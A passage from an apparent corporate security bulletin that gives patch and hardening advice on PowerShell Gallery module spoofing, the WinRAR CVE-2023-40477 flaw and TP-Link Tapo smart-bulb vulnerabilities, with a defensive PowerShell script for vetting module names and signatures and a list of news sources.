  3. Frequent Scans for Sensitive Data: Regularly scan module source code for sensitive data or vulnerabilities. This proactive approach can help detect and remediate issues before they are exploited.
  4. Real-Time Monitoring: Establish real-time monitoring systems in your cloud setups to spot any anomalous activities. This can help detect and respond to suspicious behavior promptly.
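The first two recommendations can be enforced with a small wrapper around the PowerShellGet cmdlets. This is an added example, not code from the article, Access Point or Microsoft: the trusted-module list, the publisher certificate subject and the repository name are placeholders, and the look-alike check simply drops punctuation and case before comparing names, which is exactly what separates "AzTable" from "Az.Table" above.

```powershell
# Added example, not code from the article or from Microsoft. Placeholders:
# $TrustedModules, $TrustedPublishers and the repository name are yours to set.

# Modules your team actually uses. Look-alikes such as 'Az.Table' for 'AzTable'
# normalise to the same key and are refused before anything is installed.
$TrustedModules    = @('AzTable', 'Az.Accounts', 'PSReadLine')
$TrustedPublishers = @('CN=Example Corp Code Signing')   # placeholder certificate subject

function Get-NormalizedName([string]$Name) {
    # Drop separators and case so 'Az.Table', 'az-table' and 'AzTable' collide.
    return ($Name -replace '[.\-_ ]', '').ToLowerInvariant()
}

function Test-LookAlikeName([string]$Candidate, [string[]]$Known) {
    if ($Known -contains $Candidate) { return $false }      # exact trusted name is fine
    $key = Get-NormalizedName $Candidate
    foreach ($k in $Known) {
        if ((Get-NormalizedName $k) -eq $key) { return $true }  # same letters, different punctuation
    }
    return $false
}

function Test-ModuleSignatures([string]$Path, [string[]]$Publishers) {
    # Every script, module and manifest must carry a Valid Authenticode signature
    # from an allow-listed subject; unsigned or HashMismatch files fail closed.
    foreach ($f in Get-ChildItem -Path $Path -Recurse -Include *.ps1, *.psm1, *.psd1) {
        $sig = Get-AuthenticodeSignature -FilePath $f.FullName
        if ($sig.Status -ne 'Valid') { Write-Warning "$($f.Name): $($sig.Status)"; return $false }
        if ($Publishers -notcontains $sig.SignerCertificate.Subject) {
            Write-Warning "$($f.Name): signer '$($sig.SignerCertificate.Subject)' not allow-listed"
            return $false
        }
    }
    return $true
}

function Install-VettedModule([string]$Name, [string]$Repository = 'PSGallery') {
    if (Test-LookAlikeName -Candidate $Name -Known $TrustedModules) {
        throw "'$Name' differs from a trusted module only by punctuation; refusing to install."
    }
    # Stage the package without importing it, then vet the files on disk.
    $staging = New-Item -ItemType Directory -Force -Path (Join-Path ([IO.Path]::GetTempPath()) "vet-$Name")
    Save-Module -Name $Name -Repository $Repository -Path $staging.FullName -Force
    if (-not (Test-ModuleSignatures -Path $staging.FullName -Publishers $TrustedPublishers)) {
        Remove-Item $staging.FullName -Recurse -Force
        throw "'$Name' failed signature vetting; nothing was installed."
    }
    Install-Module -Name $Name -Repository $Repository -Scope CurrentUser
}
Set-ExecutionPolicy -ExecutionPolicy AllSigned -Scope CurrentUser   # run only signed scripts from here on
Test-LookAlikeName -Candidate 'Az.Table' -Known $TrustedModules       # flags the look-alike of 'AzTable'
```

Point `$Repository` at a private feed registered with Register-PSRepository to cover the second recommendation as well; the vetting logic is the same.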

New WinRAR Vulnerability Could Allow Hackers to Take Control of Your PC  

Analysis: RARLAB, the developer of the popular file-archiving software WinRAR, has fixed a remote code execution vulnerability affecting Windows systems. The vulnerability, tracked as CVE-2023-40477, requires user interaction: a user must be lured to a malicious page or open a specially crafted file. CVE-2023-40477 (CVSS score: 7.8) is described as improper validation while processing recovery volumes. The flaw can result in memory access beyond the bounds of the allocated buffer, which an attacker can leverage to execute code in the context of the WinRAR process.

This vulnerability was found by a Zero Day Initiative researcher who goes by the name goodbyeselene, who was credited with discovering the bug and reporting it to RARLAB.

RARLAB has released a fix in WinRAR version 6.23; updating to this version or any later version remediates the vulnerability.

Access Point recommends the following:

  1. Update WinRAR: Access Point Technology recommends that all users of WinRAR software, whether for corporate or personal reasons, promptly update to version 6.23. This update addresses not only the specific flaw mentioned but also several other vulnerabilities. Keeping your software up-to-date is a critical step in maintaining the security and functionality of your systems.

TP-Link Smart Bulbs Can Let Hackers Steal Your WiFi Password

Analysis: Researchers from the University of Catania and the University of London analyzed the TP-Link Tapo L530E smart bulb and TP-Link's Tapo app. This bulb was chosen because it is the top-selling smart bulb on marketplaces such as Amazon, and its device-management app has over 10 million installations on the Google Play Store.

The goal of this research was to find security risks in the billions of IoT devices that consumers use on a day-to-day basis, many of which feature "risky data transmission and lackluster authentication safeguards".

The researchers identified four distinct vulnerabilities in their study.

The first vulnerability is improper authentication in the Tapo L530E bulb, a significant security concern (CVSS v3.1 score: 7.6). It allows an attacker in close proximity to impersonate the device during the session key exchange phase and, from there, to steal Tapo user passwords and manipulate connected Tapo devices.

The second flaw, also categorized as high severity, allows attackers to acquire a hard-coded, short checksum shared secret through methods like brute-forcing or decompiling the application.

The third issue, rated as a medium severity concern, unveiled a deficiency in randomness during symmetric encryption, undermining the cryptographic scheme's ability to remain unpredictable.

Lastly, the fourth problem revolves around a lack of checks for message freshness. This lapse results in session keys remaining valid for an extended period of 24 hours, enabling attackers to replay messages during this timeframe.

The researchers found that by chaining the first two vulnerabilities, an attacker can extract the victim's Wi-Fi SSID and password and thereby gain access to every other device on that network. The first vulnerability can also be used in a man-in-the-middle attack to intercept and manipulate communication between the app and the bulb by capturing the RSA encryption keys.

Access Point recommends the following:

  1. Isolate and Update TP-Link Smart Bulbs: Access Point Technology advises all users of TP-Link smart bulbs to isolate these devices from critical networks and ensure they are updated with the latest firmware. TP-Link is actively working on addressing these security issues, and keeping your smart bulb firmware up-to-date is essential for security. IoT devices, in general, can pose security risks due to the lack of industry-wide cybersecurity standards, encryption, and timely firmware updates. Exercise caution when adding any IoT device to your network and consider isolating them to minimize potential vulnerabilities.

Sources

https://thehackernews.com/2023/08/new-apple-ios-16-exploit-enables.html

https://thehackernews.com/2023/08/nofilter-attack-sneaky-privilege.html

https://thehackernews.com/2023/08/google-chromes-new-feature-alerts-users.html

https://thehackernews.com/2023/08/new-blackcat-ransomware-variant-adopts.html

https://thehackernews.com/2023/08/new-wave-of-attack-campaign-targeting.html

https://thehackernews.com/2023/08/wooflocker-toolkit-hides-malicious.html

https://thehackernews.com/2023/08/hiatusrat-malware-resurfaces-taiwan.html

https://thehackernews.com/2023/08/this-malware-turned-thousands-of-hacked.html

https://www.bleepingcomputer.com/news/security/cuba-ransomware-uses-veeam-exploit-against-critical-us-organizations/

https://usc-word-edit.officeapps.live.com/we/securityweek.com/cisa-warns-of-another-exploited-adobe-coldfusion-vulnerability/

https://www.darkreading.com/attacks-breaches/ivanti-issues-fix-for-critical-vuln-in-its-sentry-gateway-technology

https://www.securityweek.com/flaws-in-juniper-switches-and-firewalls-can-be-chained-for-remote-code-execution/

https://www.bleepingcomputer.com/news/security/microsoft-powershell-gallery-vulnerable-to-spoofing-supply-chain-attacks/

https://thehackernews.com/2023/08/new-winrar-vulnerability-could-allow.html

https://www.bleepingcomputer.com/news/security/tp-link-smart-bulbs-can-let-hackers-steal-your-wifi-password/
